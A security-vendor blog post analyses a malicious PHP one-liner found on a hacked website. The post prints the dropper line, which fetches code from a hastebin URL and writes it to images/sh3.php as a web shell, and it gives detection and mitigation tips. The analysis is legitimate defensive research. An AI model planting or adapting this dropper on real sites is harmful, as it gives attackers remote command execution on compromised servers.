• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login
Labs Note

Malicious One-Liner Using Hastebin

September 23, 2020Krasimir Konov

10
SHARES
FacebookTwitterSubscribe

Short scripts that deliver malware to a website are nothing new, but during a recent investigation we found a script using hastebin[.]com, which is a domain we see used infrequently. The script was found writing malicious contents into an image directory on a compromised website, allowing an attacker to execute other malicious commands.

The attacker was likely leveraging hastebin instead of pastebin since it’s not as frequently used. This obscurity offers some advantages for the attacker, as many security plugins and modules would instead look for links to the more popular pastebin service, flagging them as suspicious.

Here are the contents of the malicious one-liner:

<?php 
fwrite(fopen(images/sh3.php,w+),file_get_contents(https://hastebin.com/raw/oqikagison)); 
?>

Although the attacker appears to have failed to properly inject the malicious code due to some missing single quotes, this is still a good example of how simple and yet powerful a short script of malware can be.

The malware pulls the malicious code from the hastebin URL and writes it into images/sh3.php. The remote code is basically a shell script, using PHP’s “system” call to execute additional commands submitted by the attacker through $_GET requests.

You can see how this one-liner can be added to the bottom of any file and easily missed by a webmaster if they are not trained to look for malware. To properly run, the directory images referenced in the script must exist on the website, but this file name can be effortlessly modified by the attacker at will, allowing the malware to be written to a file within an images directory.

To help mitigate risk, consider using a server-side scanner that scans the website at the server level along with a file integrity monitoring service to notify you of any changes to website files.

10
SHARES
FacebookTwitterSubscribe

Categories: Sucuri Labs, Website Malware Infections, Website SecurityTags: Black Hat Tactics, Hacked Websites, Labs Note

About Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.

Reader Interactions

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

2019 Threat Report

The Anatomy of Website Malware Webinar

Join Over 20,000 Subscribers!

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2021 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.